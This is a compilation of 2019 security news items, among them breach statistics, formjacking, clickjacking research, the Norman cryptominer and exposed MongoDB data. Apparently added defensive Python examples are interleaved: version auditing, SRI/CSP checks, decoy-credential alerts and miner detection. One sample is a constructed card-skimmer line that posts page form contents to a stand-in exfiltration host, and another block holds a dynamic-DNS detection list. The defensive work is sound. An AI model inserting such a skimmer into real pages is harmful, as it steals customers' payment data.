The number of data breaches spiked dramatically in the first half of this year compared to previous years, according to a report from vulnerability intelligence company Risk Based Security. Its analysis found that breach numbers for the first six months of 2019 grew by 54% compared to the same period last year, while the number of exposed records grew 52%.
The growth in data breach volume bucks a trend that saw the number of breaches plateau in 2017 and 2018.
"The reason? Over 1,300 data leaks, mostly exposing email addresses and passwords, were documented in the first half of 2019," the report said. "Although these tend to be relatively small events, averaging fewer than 230 records exposed per incident, these leaks have contributed substantially to the number of access credentials freely available on the Internet."
The number of records exposed in 1H 2019 (4.19 billion) may be larger than in 2018 (2.74 billion), but historical record volumes are more erratic. The first half of 2017 saw six billion records exposed, the report said.
According to the report, eight breaches within the first half of this year accounted for 3.2 billion breached records, or 78.6% of the total. Three of the breaches were among the largest of all time.
Six of the top eight breaches stemmed from misconfigured databases or web applications: Verifications.io (982 million records), First American Financial (885 million), Cultura Colectiva (540 million), two unknown organizations in India and China (275 million and 202 million, respectively) and Justdial (100 million).
Web-based breaches like these are by far the largest in terms of exposed records, accounting for 79% of all records exposed in the first half of the year.
Only two of the top eight – Dubsmash's 161 million-record breach and Canva's loss of 139 million records – were down to other hacking techniques.
The number of breaches doesn't tell the whole story, either. While the first half of this year yielded more breaches than ever before, the majority had a moderate to low severity score and exposed 10,000 records or fewer.
The type of data stolen also plays a part. Email addresses and passwords are still the primary records stolen, present in 70% and 65% of stolen data sets, respectively. These can be used for credential stuffing when the same password is reused across multiple sites, but they can also be changed, the report points out.
More critical data was less commonly stolen. Addresses, credit card and Social Security numbers were only stolen in 11% of attacks, with account numbers only showing up in 10%.
The European Central Bank (ECB) has been forced to shut down one of its websites following a cyber-attack which may have compromised subscriber data.
The bank said in a brief statement that hackers had compromised its Banks’ Integrated Reporting Dictionary (BIRD) website, which is hosted by an external third party.
It claimed that malware had been injected onto the server “to aid phishing activities.”
“As a result, it was possible that the contact data (but not the passwords) of 481 subscribers to the BIRD newsletter may have been captured,” the statement continued.
“The affected information consists of the email addresses, names and position titles of the subscribers. The ECB is contacting people whose data may have been affected.”
The BIRD website is said to provide the banking industry with info designed to help produce statistical and supervisory reports.
The ECB said that as it is physically separate from any other external and internal ECB systems, no market-sensitive data has been affected by the incident.
The BIRD website has been closed until further notice and the European Data Protection Supervisor has been informed about the breach.
This isn’t the first time the ECB has been hit by hackers. In 2014, attackers managed to compromise a database containing website form data – stealing 20,000 email addresses which they then tried to hold to ransom.
The financial sector has always been a major target for hackers.
It has seen a 67% increase in security breaches over the past five years, with the average cost of cybercrime for financial institutions jumping $1.4m over the past year to reach $13m, according to an Accenture report from earlier this year.
A leading open source project has come under fire for issuing misleading security advisories which may have put customers of its software at unnecessary risk.
Security vendor Synopsys analyzed 115 separate releases for popular web application framework Apache Struts and matched them up against the relevant advisories from the open source project.
In total, 24 of the 57 Apache Struts security advisories – nearly half – made mistakes when listing the versions of the framework that were impacted by vulnerabilities.
In fact, 61 additional versions of Apache Struts were impacted by at least one previously disclosed vulnerability, potentially exposing users to attack.
“While our findings included the identification of versions that were falsely reported as impacted in the original disclosure, the real risk for consumers of a component is when a vulnerable version is missed in the original assessment,” Synopsys argued.
“Given that development teams often cache ‘known good’ versions of components in an effort to ensure error-free compilation, under-reporting of impacted versions can have a lasting impact on overall product security.”
On the plus side, the Apache Software Foundation and Apache Struts team were praised for their “diligence” in collaborating with Synopsys on fixing the mistakes. An updated Apache Struts Security Advisories page was published earlier this week.
Apache Struts will be known to many as the web app framework which Equifax failed to patch back in 2017, leading to a major breach of personal and financial information on nearly half of all Americans and millions of UK consumers.
That incident has already cost the credit agency in excess of $1bn, as well as the jobs of the CEO and other senior executives.
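The practical lesson of the Synopsys findings is that a single advisory's "affected versions" list is not a safe source of truth: a team that pins a "known good" version should match it against every range it can get. The following is an added example, not Synopsys or Apache code, of a small version-range matcher that unions the ranges from two hypothetical advisory feeds before checking pinned versions. The advisory IDs, ranges and application names are constructed for illustration and are not the real Struts advisories.

```python
def parse_version(v: str) -> tuple:
    """'2.3.31' -> (2, 3, 31); tolerant of a fourth component such as '2.5.10.1'."""
    return tuple(int(p) for p in v.strip().split("."))


def cmp_versions(a: tuple, b: tuple) -> int:
    """Compare after right-padding with zeros so that 2.5 == 2.5.0."""
    n = max(len(a), len(b))
    a, b = a + (0,) * (n - len(a)), b + (0,) * (n - len(b))
    return (a > b) - (a < b)


def in_range(version: str, lo: str, hi: str) -> bool:
    """Inclusive lo..hi containment."""
    v = parse_version(version)
    return cmp_versions(v, parse_version(lo)) >= 0 and cmp_versions(v, parse_version(hi)) <= 0


def affected_by(version: str, advisories: dict) -> list:
    """Advisory IDs whose affected ranges (list of inclusive (lo, hi) pairs) contain `version`."""
    return sorted(adv for adv, ranges in advisories.items()
                  if any(in_range(version, lo, hi) for lo, hi in ranges))


def merge_sources(*sources: dict) -> dict:
    """Union the ranges from several feeds so an under-reporting feed cannot hide a version."""
    merged = {}
    for src in sources:
        for adv, ranges in src.items():
            merged.setdefault(adv, [])
            for r in ranges:
                if r not in merged[adv]:
                    merged[adv].append(r)
    return merged


def audit_pins(pins: dict, advisories: dict) -> dict:
    """application -> advisories its pinned version falls inside."""
    return {app: affected_by(ver, advisories) for app, ver in pins.items()}


# Constructed, hypothetical advisory data (not the real Struts advisories).
VENDOR_FEED = {"ADV-A": [("2.3.5", "2.3.31")]}                            # omits the 2.5 branch
SCANNER_FEED = {"ADV-A": [("2.3.5", "2.3.31"), ("2.5.0", "2.5.10")]}      # a second source lists it
PINNED = {"billing-api": "2.3.20", "portal": "2.5.10", "reports": "2.5.10.1"}

if __name__ == "__main__":
    print("vendor feed only:", audit_pins(PINNED, VENDOR_FEED))
    print("merged feeds:    ", audit_pins(PINNED, merge_sources(VENDOR_FEED, SCANNER_FEED)))
```

With only the vendor feed the "portal" pin at 2.5.10 looks clean; merging in the second feed flags it, which is exactly the under-reporting case Synopsys describes.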
Formjacking accounted for 71% of all web-related data breaches in 2018 as hackers looked to steal customers’ financial information in large quantities, according to F5 Labs.
The security vendor’s Application Report 2019 is compiled from analysis of 760 breaches and revealed that attacks like those featuring Magecart digital skimmers are on the rise.
Already this year, there have been 83 reported attacks on web payment forms, compromising over 1.3 million payment cards, the firm claimed.
The transport industry was the biggest victim of formjacking attacks, accounting for 60% of all credit card-related theft during the reporting period, followed by retail (49%), business services (14%) and manufacturing (11%).
The report also revealed that 11% of newly discovered exploits in 2018 were part of a formjacking attack chain, including remote code execution (5.4%), arbitrary file inclusion (3.8%) and remote CMD execution (1.1%).
David Warburton, senior threat evangelist at F5 Networks, argued that formjacking attacks have “exploded in popularity” over the past two years.
“Web applications are increasingly outsourcing critical components of their code, such as shopping carts and card payment systems, to third parties. Web developers are making use of imported code libraries or, in some cases, linking their app directly to third party scripts hosted on the web,” he explained.
“As a result, businesses find themselves in a vulnerable position as their code is compiled from dozens of different sources – almost all of which are beyond the boundary of normal enterprise security controls. Since many web sites make use of the same third-party resources, attackers know that they just need to compromise a single component to skim data from a huge pool of potential victims.”
“The injection landscape is transforming along with our behavior,” said Warburton.
“Adequately detecting and mitigating injection flaws now depends on adapting assessments and controls – not just fixing code. The more code we hand over to third parties, the less visibility and less control we have over it.”
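Two controls follow directly from Warburton's point about third-party scripts: pin each external script with a Subresource Integrity (SRI) hash so a skimmer appended at the CDN fails to load, and restrict `script-src` in a Content Security Policy to the hosts the page actually uses. The block below is an added example (not F5's code and not from any real site) that audits a constructed page for third-party scripts lacking SRI or whose fetched body no longer matches the pinned hash, and emits the matching `script-src` directive. The hosts, script bodies and the `fake_fetch` stand-in for an HTTP client are all assumptions made for the example.

```python
import base64
import hashlib
from html.parser import HTMLParser
from urllib.parse import urlparse


def sri_hash(body: bytes, algo: str = "sha384") -> str:
    """Subresource Integrity value ('sha384-<base64 digest>') for a script body."""
    digest = hashlib.new(algo, body).digest()
    return f"{algo}-{base64.b64encode(digest).decode()}"


class _ScriptCollector(HTMLParser):
    """Collect the attributes of every <script src=...> tag in a page."""

    def __init__(self) -> None:
        super().__init__()
        self.scripts = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "script":
            a = dict(attrs)  # HTMLParser lowercases attribute names
            if a.get("src"):
                self.scripts.append(a)


def find_scripts(html: str) -> list:
    p = _ScriptCollector()
    p.feed(html)
    return p.scripts


def is_third_party(src: str, page_origin: str) -> bool:
    host = urlparse(src).netloc
    return bool(host) and host != urlparse(page_origin).netloc


def audit_scripts(html: str, page_origin: str, fetch) -> list:
    """Flag third-party scripts with no SRI hash, or whose fetched body no longer matches it.

    `fetch(url) -> bytes` is supplied by the caller so the same audit can run against
    a live CDN or, as here, against constructed bodies.
    """
    findings = []
    for s in find_scripts(html):
        src = s["src"]
        if not is_third_party(src, page_origin):
            continue  # first-party scripts sit inside the enterprise's own controls
        integrity = s.get("integrity")
        if not integrity:
            findings.append((src, "third-party script loaded without an integrity attribute"))
            continue
        algo = integrity.split("-", 1)[0]  # single-hash integrity values only
        if sri_hash(fetch(src), algo) != integrity:
            findings.append((src, "integrity hash does not match the fetched content"))
    return findings


def script_src_policy(html: str, page_origin: str) -> str:
    """CSP script-src directive allowing 'self' plus only the third-party hosts the page uses."""
    hosts = sorted({urlparse(s["src"]).netloc for s in find_scripts(html)
                    if is_third_party(s["src"], page_origin)})
    return "script-src 'self' " + " ".join(f"https://{h}" for h in hosts)


# --- Constructed sample data (hypothetical hosts; not a real site or skimmer) ---
PAGE_ORIGIN = "https://shop.example.test"
CART_ORIGINAL = b"window.cart = {items: []};\n"
# The same file after a hypothetical skimmer was appended at the CDN.
CART_SKIMMED = CART_ORIGINAL + b"fetch('https://exfil.example.test/c', {method: 'POST', body: document.forms[0].innerText});\n"
FETCHED = {
    "https://cdn.example-cart.test/cart.js": CART_SKIMMED,
    "https://static.example-pay.test/checkout.js": b"/* checkout */\n",
}


def fake_fetch(url: str) -> bytes:
    return FETCHED[url]


# The page pinned cart.js to the hash of the ORIGINAL body; checkout.js carries no SRI at all.
SAMPLE_HTML = f"""<html><head>
<script src="https://cdn.example-cart.test/cart.js" integrity="{sri_hash(CART_ORIGINAL)}" crossorigin="anonymous"></script>
<script src="https://static.example-pay.test/checkout.js"></script>
<script src="/js/app.js"></script>
</head><body><form action="/pay"></form></body></html>"""

if __name__ == "__main__":
    for src, issue in audit_scripts(SAMPLE_HTML, PAGE_ORIGIN, fake_fetch):
        print(f"{src}: {issue}")
    print(script_src_policy(SAMPLE_HTML, PAGE_ORIGIN))
```

SRI only helps for scripts whose content you can pin; a payment provider that ships a changing script every week forces you back to CSP host restrictions plus monitoring, which is the visibility problem Warburton is describing.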
Online election interference has become such a concern that one company has now launched a product to help protect against it. ZeroFOX has announced a security suite to safeguard political candidates and campaigns from online threats.
The ZeroFOX Election Protection Solution analyzes data across social media and other online sources, including the deep web (content behind logins or otherwise not indexed by public search engines) and the dark web (usually .onion sites accessed via Tor). It searches for fake accounts, phishing attacks and threats of physical harm, along with malware links and malicious domains and websites.
ZeroFOX has a situational awareness team that helps to address fake or malicious content and take it down from campaign-owned digital platforms in real time. It will also work with social media networks to remove content that violates the networks' terms of service (ToS), says ZeroFOX CTO Mike Price.
"ZeroFOX bridges customers to the social networks, requesting that ToS-violating content be taken down where appropriate," he says. "The social networks are the entities that ultimately decide how to respond to any given piece of content. If they agree that a piece of content violates ToS and should be taken down, then it is generally quickly taken down."
Users of the product first determine which candidates and websites to protect, and then configure rules from a library of pre-built policies to watch for spoof accounts, takeovers and inappropriate content, including online threats.
ZeroFOX also claims to be the first offering a deepfake detection solution as part of the product. That technology, announced at the Black Hat conference last week, uses artificial intelligence to look for fake videos. The company also donated its AI deepfake detection toolkit, Deepstar, to the open source community to help others train AI data sets that can help spot fake videos.
Election interference using digital platforms continues to be a concern in various regions. Last month, a Senate Intelligence Committee report found that Russia had probably targeted election infrastructure in all 50 states over the last few years. Another report found San Mateo County's election systems vulnerable to hijacking and propagating disinformation. In May, a report from SecurityScorecard found political parties in several countries badly failing at protecting their election systems.
In Europe, the EU issued a statement earlier this year calling out election disinformation campaigns by Russia, China, North Korea, and Iran.
Companies using decoy systems to lure hackers away from legitimate targets spot hackers in their networks much more quickly than those who don't, according to a survey released today. The study, conducted by analyst company Enterprise Management Associates (EMA) and commissioned by deception technology vendor Attivo Networks, found that companies using deception techniques detected hackers on the network almost two months sooner than those that didn't use the techniques.
Deception technology attempts to throw attackers off the trail by offering up decoy assets for them to attack. Modern solutions include things like fake credentials, browser histories and registry entries, which lure attackers to decoy systems. They are typically invisible to legitimate network users but accessible via dual-use tools like PowerShell, which attackers often use to traverse networks.
EMA surveyed 208 respondents, ranging from IT managers through to CISOs and line-of-business managers, across various sectors. Roughly half of the organizations (55%) used deception technology. Of those that did, around half used commercial solutions, while 18% relied on traditional honeypots or honey nets and 30% used homegrown or open source solutions.
One of the most significant differences in the effects of deception technology was on dwell time (the length of time that attackers lurk in the company network). On average, respondents who had discovered attackers in their infrastructure reported a 31.9-day dwell time. Users of deception technology who considered themselves highly familiar with it reported a dwell time of 5.5 days, compared with the 60.9 days reported by nonusers.
Those that used deception technology most often created decoy IT infrastructure systems like LDAP servers and IT network devices like switches and routers. Almost one in five (19%) of respondents emulated these systems, with enterprise applications like CRM and ERP coming a close second at 15%. They most often deployed decoy technology in cloud-hosted systems and applications, followed by their own applications and servers.
The use of deception technology also played a part in how companies discovered breaches. On average, 26% of respondents learned of them from outsiders. Fewer than one in five (18%) companies using deception technology found out about it this way, compared to 36% of the companies that didn't use it.
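The survey's "fake credentials" lure works because a planted account has no legitimate user: the first time it appears in an authentication log, someone has harvested it. The block below is an added example, not Attivo's or EMA's code, of the detection side of that idea. It runs over constructed Windows Security events (4624 successful and 4625 failed logons, reduced to the fields a SIEM would forward) and raises an alert on any use of a hypothetical decoy account, grading a successful logon to a decoy host as critical. The account names, hosts and addresses are all invented for the example.

```python
from collections import defaultdict

# Hypothetical decoy accounts: credentials planted on endpoints that no legitimate
# person or process ever uses, so any attempt to log on with them is an attacker.
DECOY_ACCOUNTS = {"svc_backup_admin", "sqladmin-legacy"}

# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"ts": "2019-08-13T01:58:10Z", "event_id": 4624, "user": "jdoe",
     "src_ip": "10.20.3.44", "host": "WS-JDOE", "logon_type": 2},
    {"ts": "2019-08-13T02:14:05Z", "event_id": 4625, "user": "svc_backup_admin",
     "src_ip": "10.20.3.44", "host": "FS01", "logon_type": 3},
    {"ts": "2019-08-13T02:14:09Z", "event_id": 4625, "user": "SVC_BACKUP_ADMIN",
     "src_ip": "10.20.3.44", "host": "FS02", "logon_type": 3},
    {"ts": "2019-08-13T02:16:40Z", "event_id": 4624, "user": "sqladmin-legacy",
     "src_ip": "10.20.3.44", "host": "DECOY-SQL01", "logon_type": 3},
    {"ts": "2019-08-13T08:01:00Z", "event_id": 4624, "user": "jdoe",
     "src_ip": "10.20.3.44", "host": "WS-JDOE", "logon_type": 2},
]


def detect_decoy_use(events, decoys=DECOY_ACCOUNTS):
    """One alert per logon event that names a decoy account, ordered by time.

    4624 (success) on a decoy is 'critical': the attacker has reached a decoy host.
    4625 (failure) is 'high': the planted credential was harvested and tried.
    """
    alerts = []
    for e in events:
        if e["user"].lower() not in decoys:
            continue
        alerts.append({
            "ts": e["ts"],
            "severity": "critical" if e["event_id"] == 4624 else "high",
            "account": e["user"].lower(),
            "src_ip": e["src_ip"],
            "target": e["host"],
            "logon_type": e["logon_type"],   # 3 = network logon, i.e. lateral movement
        })
    return sorted(alerts, key=lambda a: a["ts"])


def first_contact(alerts):
    """Earliest decoy interaction per source address: where the dwell-time clock starts."""
    first = {}
    for a in alerts:
        if a["src_ip"] not in first or a["ts"] < first[a["src_ip"]]:
            first[a["src_ip"]] = a["ts"]
    return first


def hosts_touched(alerts):
    """Hosts each source tried the decoy credentials against, in order (the movement path)."""
    touched = defaultdict(list)
    for a in alerts:
        if a["target"] not in touched[a["src_ip"]]:
            touched[a["src_ip"]].append(a["target"])
    return dict(touched)


if __name__ == "__main__":
    alerts = detect_decoy_use(SAMPLE_EVENTS)
    for a in alerts:
        print(a)
    print("first contact:", first_contact(alerts))
    print("hosts touched:", hosts_touched(alerts))
```

The timestamp comparison relies on every event carrying the same ISO 8601 UTC format; normalise at ingestion if your sources differ.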
Clickjacking is alive and well, hijacking browsers that visit hundreds of popular websites, according to research released this week. A paper published by researchers at the Chinese University of Hong Kong, Microsoft Research, Seoul National University, Purdue University, and Pennsylvania State University, found that many of the world's most popular sites are still fooling visitors into following deceptive links to unexpected destinations.
Clickjacking is a well-established technique in which third-party scripts or browser extensions can hijack users' clicks, redirecting them to alternate locations. Online crooks can use them to download malware to a victim's computer or to commit advertising fraud, redirecting clicks to online ads and earning commission.
Advertising click fraudsters used to use online bots to automatically click online ads at scale, but ad networks got wise to this practice. Instead, attackers have recently begun redirecting legitimate page clicks from real users, the paper says.
Observer, the detection tool the researchers built for the study, found 613 websites using 437 third-party scripts that intercepted user clicks. That may not sound like many, but the websites collectively received 43 million daily visits, according to the paper.
These scripts tricked users into following links by disguising them as legitimate site content. Observer spotted 3,251 clickjacking destination URLs, with 36% related to online advertising.
Attackers used three devious techniques to intercept user clicks. One involved intercepting hyperlinks by tampering with hyperlink tags or embedding hyperlinks in huge page elements that covered at least 75% of the browser window. The second used event handlers such as navigation event listeners, which would open the malicious URL when the user clicked anything on a page.
The final technique was visual deception, which either mimicked legitimate page content such as Facebook Like buttons or put a transparent overlay element over legitimate content. Attackers could use either approach to hijack a user's click on a button or other page element.
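The three patterns above translate into heuristics a site owner can run against a DOM crawl of their own pages: a cross-origin link element covering most of the viewport, a document-level click listener that navigates off-site, and a near-transparent element stacked over a real button. The block below is an added example, not the Observer tool from the paper, that applies those heuristics to a constructed description of a page's rendered elements (the `Element` records, hosts and sizes are assumptions made for the example; a real run would populate them from a headless browser).

```python
from dataclasses import dataclass
from typing import Optional
from urllib.parse import urlparse


@dataclass
class Element:
    """A rendered element as a DOM crawler would report it (constructed for this example)."""
    tag: str
    x: int
    y: int
    w: int
    h: int
    opacity: float = 1.0
    z_index: int = 0
    href: Optional[str] = None          # target of an <a href>
    click_target: Optional[str] = None  # URL opened by a click handler attached to the element


def is_cross_origin(url: str, page_origin: str) -> bool:
    return urlparse(url).netloc not in ("", urlparse(page_origin).netloc)


def viewport_fraction(el: Element, vw: int, vh: int) -> float:
    """Fraction of the viewport the element covers, clipped to the visible area."""
    x1, y1 = max(el.x, 0), max(el.y, 0)
    x2, y2 = min(el.x + el.w, vw), min(el.y + el.h, vh)
    if x2 <= x1 or y2 <= y1:
        return 0.0
    return (x2 - x1) * (y2 - y1) / (vw * vh)


def overlaps(a: Element, b: Element) -> bool:
    return a.x < b.x + b.w and b.x < a.x + a.w and a.y < b.y + b.h and b.y < a.y + a.h


def audit_click_interception(page_origin, viewport, elements, document_click_targets,
                             cover_threshold=0.75):
    """Apply the paper's three interception patterns as heuristics.

    Returns (pattern, what is intercepted, where the click goes) triples.
    """
    vw, vh = viewport
    findings = []
    for el in elements:
        dest = el.href or el.click_target
        if not dest or not is_cross_origin(dest, page_origin):
            continue
        # 1. Huge hyperlink: a cross-origin link element covering most of the viewport.
        if viewport_fraction(el, vw, vh) >= cover_threshold:
            findings.append(("huge-hyperlink", f"<{el.tag}> covering viewport", dest))
        # 3. Visual deception: a (near-)transparent element stacked over a real link.
        if el.opacity <= 0.05:
            for under in elements:
                if under is not el and under.href and overlaps(el, under) and el.z_index > under.z_index:
                    findings.append(("transparent-overlay", under.href, dest))
                    break
    # 2. Event-handler interception: a document-level click listener that navigates off-site.
    for url in document_click_targets:
        if is_cross_origin(url, page_origin):
            findings.append(("document-click-listener", "any click on the page", url))
    return findings


# --- Constructed page (hypothetical hosts; not a real site) ---
PAGE = "https://news.example.test"
ELEMENTS = [
    Element("a", 20, 10, 120, 30, href="https://news.example.test/about"),
    Element("a", 300, 400, 60, 24, href="https://news.example.test/share"),                      # real share button
    Element("a", 300, 400, 60, 24, opacity=0.0, z_index=10, href="https://ads.example.test/x"),   # invisible overlay
    Element("div", 0, 0, 1280, 700, click_target="https://ads.example.test/landing"),            # covers the page
]
DOC_LISTENERS = ["https://ads.example.test/anyclick"]

if __name__ == "__main__":
    for finding in audit_click_interception(PAGE, (1280, 800), ELEMENTS, DOC_LISTENERS):
        print(finding)
```

Mimicry of legitimate controls (the fake Like button) is not caught by geometry alone; that case needs a comparison of the element's destination against the brand it imitates, which is out of scope here.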
Security researchers have found a stealthy new cryptocurrency mining malware variant which was used as part of an attack that infected almost an entire organization.
After being notified of unstable applications and network slowdowns in a client organization, security firm Varonis decided to investigate further.
“Almost every server and workstation was infected with malware. Most were generic variants of cryptominers. Some were password dumping tools, some were hidden PHP shells, and some had been present for several years,” it explained in a blog post.
“Out of all the cryptominer samples that we found, one stood out. We named it ‘Norman’.”
Norman is a high-performance miner of Monero currency that differed from many of the other samples discovered in its sophisticated attempts to stay hidden.
Unusually, it is compiled with Nullsoft Scriptable Install System (NSIS), an open source system usually employed to create Windows installers.
The injection payload is designed to execute a cryptocurrency miner and stay hidden, said Varonis.
It avoids detection by terminating the miner function when the Task Manager is opened by a curious user. Once closed, it will re-inject the miner and start again.
The miner itself is XMRig, obfuscated in the malware by UPX and injected into either Notepad or Explorer depending on the execution path.
Varonis believes the cryptocurrency mining malware it discovered could be linked to a PHP shell it found in the victim organization continually connecting to a command-and-control (C2) server. Like Norman, the PHP shell used DuckDNS for C2 comms.
“None of the malware samples had any lateral movement capabilities, though they had spread across different devices and network segments,” the firm explained. “Though the threat actor could have infected each host individually (perhaps via the same vector used in the initial infection), it would have been more efficient to use the PHP-Shell to move laterally and infect other devices in the victim’s network.”
However, it also claimed there were no coding similarities between the two, or communications capabilities between the crypto-mining malware and PHP shell.
The malware authors could be French speaking, given the language was present in some of the code.
Varonis urged firms worried about crypto-jacking to: keep operating systems up-to-date; monitor network traffic and web proxies; maintain anti-virus on endpoints; keep an eye on DNS and CPU activity; and have an incident response plan ready and tested.
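Two of the signals Varonis lists are cheap to turn into detections from what the post describes: Norman and the PHP shell both resolved dynamic-DNS names at DuckDNS for C2, and the miner runs inside Notepad or Explorer, processes that should never hold high CPU for long. The block below is an added example, not Varonis's code, that parses constructed resolver log lines for dynamic-DNS lookups, checks constructed per-process CPU samples for a sustained hot Notepad/Explorer, and scores hosts that show both. The log format, the DNS suffix list and the CPU thresholds are assumptions made for the example.

```python
import re
from collections import Counter, defaultdict

# Dynamic-DNS providers commonly used for throwaway C2 names; DuckDNS is the one
# Varonis reported. Extend the tuple to suit your environment.
DYNAMIC_DNS_SUFFIXES = (".duckdns.org", ".no-ip.org", ".hopto.org")
# Processes Norman is reported to inject XMRig into; neither should burn CPU for minutes.
INJECTION_HOSTS = {"notepad.exe", "explorer.exe"}

# Constructed resolver log (hypothetical format: "<ts> <client> query <type> <name>").
SAMPLE_DNS_LOG = """\
2019-08-14T10:00:01Z 10.0.5.17 query A updates.example-vendor.test
2019-08-14T10:00:05Z 10.0.5.17 query A miner-relay-77.duckdns.org
2019-08-14T10:05:05Z 10.0.5.17 query A miner-relay-77.duckdns.org
2019-08-14T10:10:05Z 10.0.5.17 query A miner-relay-77.duckdns.org
2019-08-14T10:10:09Z 10.0.5.23 query A www.example-news.test
2019-08-14T10:11:00Z 10.0.5.31 query A shell-cb.duckdns.org
"""
# Constructed per-host process CPU samples: (host_ip, process, cpu_percent), one minute apart.
SAMPLE_CPU = [
    ("10.0.5.17", "notepad.exe", 92.0), ("10.0.5.17", "notepad.exe", 95.5),
    ("10.0.5.17", "notepad.exe", 90.1), ("10.0.5.23", "chrome.exe", 88.0),
    ("10.0.5.31", "explorer.exe", 3.0), ("10.0.5.31", "explorer.exe", 4.1),
]

DNS_RE = re.compile(r"^(?P<ts>\S+) (?P<client>\S+) query (?P<qtype>\S+) (?P<name>\S+)$")


def parse_dns_log(text):
    for line in text.splitlines():
        m = DNS_RE.match(line)
        if m:
            yield m.groupdict()


def dynamic_dns_lookups(text):
    """client -> Counter of dynamic-DNS names it resolved (beaconing shows up as repeats)."""
    hits = defaultdict(Counter)
    for rec in parse_dns_log(text):
        name = rec["name"].lower().rstrip(".")
        if name.endswith(DYNAMIC_DNS_SUFFIXES):
            hits[rec["client"]][name] += 1
    return dict(hits)


def hot_injection_targets(samples, threshold=50.0, min_samples=3):
    """host -> injection-target processes that stayed above `threshold` CPU for `min_samples` samples."""
    per = defaultdict(list)
    for host, proc, cpu in samples:
        if proc.lower() in INJECTION_HOSTS:
            per[(host, proc.lower())].append(cpu)
    out = defaultdict(list)
    for (host, proc), cpus in per.items():
        if len(cpus) >= min_samples and min(cpus) >= threshold:
            out[host].append(proc)
    return dict(out)


def correlate(dns_text, cpu_samples):
    """Score each host: one point for dynamic-DNS beaconing, one for a hot Notepad/Explorer."""
    dns = dynamic_dns_lookups(dns_text)
    cpu = hot_injection_targets(cpu_samples)
    scores = {}
    for host in set(dns) | set(cpu):
        reasons = []
        if host in dns:
            reasons.append("dynamic-dns: " + ", ".join(sorted(dns[host])))
        if host in cpu:
            reasons.append("cpu: " + ", ".join(cpu[host]))
        scores[host] = (len(reasons), reasons)
    return scores


if __name__ == "__main__":
    for host, (score, reasons) in sorted(correlate(SAMPLE_DNS_LOG, SAMPLE_CPU).items()):
        print(host, score, reasons)
```

A browser pegging the CPU (10.0.5.23) is ignored on purpose; the point is the process that has no business being hot. Because Norman suspends mining while Task Manager is open, sample CPU from an agent or the hypervisor rather than by hand.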
While around a third of 18-year-olds have been accepted for a university place through UCAS, new opportunities have been opened for cybersecurity experience.
Although statistics from UCAS show that 28.5% of the 18-year-old population have been accepted through UCAS, with 33,630 international students from outside the EU and 26,440 students from within the EU accepted, there is an overall 1% decrease in the number of people placed on undergraduate courses in the UK so far.
However, options exist for those students looking for a career path into cybersecurity, which “are a really good alternative to the stress of Clearing” according to CREST president Ian Glover.
He told Infosecurity that cybersecurity higher apprenticeships are not only an alternative route for those who do not get the choice of first or second university course, but they provide an excellent way to get a degree, along with work experience and without having to take on large student loans.
“Programs like the government’s cyber apprenticeships that provide structured learning, with assessed work activities, result in qualifications and experience that allow young people to enter and progress in the cybersecurity profession,” he said. “It also opens up a career in cybersecurity to a far wider and more diverse group of young people.”
Also offering opportunities today is Immersive Labs, which is offering free access to its cyber-skills development platform. Backed by Goldman Sachs and developed by an ex-GCHQ trainer, the technology will give students access to a purpose-built set of ‘labs’ which drop the user into entry-level cybersecurity challenges.
Each lab is run through the browser and drops the student into a simulated incident which appears as it would to a security team in a company, and encourages them to teach themselves the skills to progress.
James Hadley, Immersive Labs founder and CEO, said: “The world is crying out for cybersecurity talent, yet the majority of ways we are trying to train these people are broken. While university can be a valuable path for some, its rigid conditions can also be exclusive.
“Not everyone wants to sit in a classroom learning passively. My experience at GCHQ taught me the best cyber-talent is creative and curious; they learn by breaking things and thinking on their feet. Unfortunately, this jars with traditional teaching methods, which I fear is leading to an unnecessary talent drain. We have opened up our platform to give these individuals an opportunity to learn.”
The offer remains open for today and for a week after to those who can prove they haven’t got into their first choice of university via a sign-up form on the website. The labs will stay available for six months and will be periodically updated with new content.
Hackers claim to have stolen 700,000 customer records from Choice Hotels thanks to an exposed MongoDB instance, it has emerged.
The US-based chain, which runs franchised outlets in over 40 countries worldwide, is now being held to ransom after the hackers left a note demanding 0.4 Bitcoin (around $3800) in payment for the data, which they claimed to have copied.
Security researcher Bob Diachenko worked with security firm Comparitech to discover the database, which was left completely exposed online. However, hackers had already got there: it had been online without password protection for only four days before attackers found it.
Although the database held 5.6 million records in total, Choice Hotels told Comparitech that most of these related to test data. Of the 700,000 genuine records stolen, names, email addresses and phone numbers of customers are among the details taken.
The server itself is said to have been owned and managed by a third party who was working with the hotel chain on a new “tool.”
“We have discussed this matter with the vendor and will not be working with them in the future,” Choice Hotels told Comparitech in an email.
“We are evaluating other vendor relationships and working to put additional controls in place to prevent any future occurrences of this nature. We are also establishing a Responsible Disclosure Program, and we welcome Mr Diachenko’s assistance in helping us identify any gaps.”
Diachenko believed the ransom note was left by an automated script set up specifically to target exposed MongoDB databases, although it didn’t succeed in wiping the data.
This is only the latest of many similar incidents involving unsecured MongoDB instances.
This year alone, hundreds of millions of individuals have had their personal data exposed, including 200 million Chinese CVs, 12.5 million Indian mothers, and 808 million records from an email validation firm.
Unsurprisingly, hackers are getting wise to these misconfigurations: earlier this month it was revealed that attackers stole 2.1 million records from a Mexican bookstore, demanding a ransom.
KnowBe4 security awareness advocate, Javvad Malik, argued that the Choice Hotels incident is yet another example of user error.
“While Choice Hotels may be correct in that the data was hosted by a third party and none of their servers were compromised, it does not change the fact that it was their customer data which was breached,” he added. “It has an obligation to ensure the security of its customer data whether it’s kept by themselves, or handed over to a third party.”
The woman allegedly responsible for the massive breach of customer data at Capital One stole data from 30 other organizations, according to new information from prosecutors.
In a new court filing, they alleged that Paige Thompson stole terabytes of information from enterprises, educational institutions and other organizations, although she claims not to have sold or distributed any of it to others.
The information is being revealed as part of efforts by prosecutors to persuade the judge to deny bail.
The filing alleges that Thompson has a history of threatening behavior, including threats to kill others and herself. She is also said to have harassed a couple for seven years, forcing them to obtain a protection order.
Investigators found the new information on data breaches on servers in Thompson’s bedroom.
“That data varies significantly in both type and amount. For example, much of the data appears not to be data containing personal identifying information,” the court filing explained.
“At this point, however, the government is continuing to work to identify specific entities from which data was stolen, as well as the type of data stolen from each entity. The government expects to add an additional charge against Thompson based upon each such theft of data, as the victims are identified and notified.”
It’s claimed that the Capital One breach affected over 100 million American and Canadian customers, including consumers and small businesses.
The trove included 140,000 Social Security numbers, 80,000 linked bank account numbers and one million Canadian Social Insurance numbers.
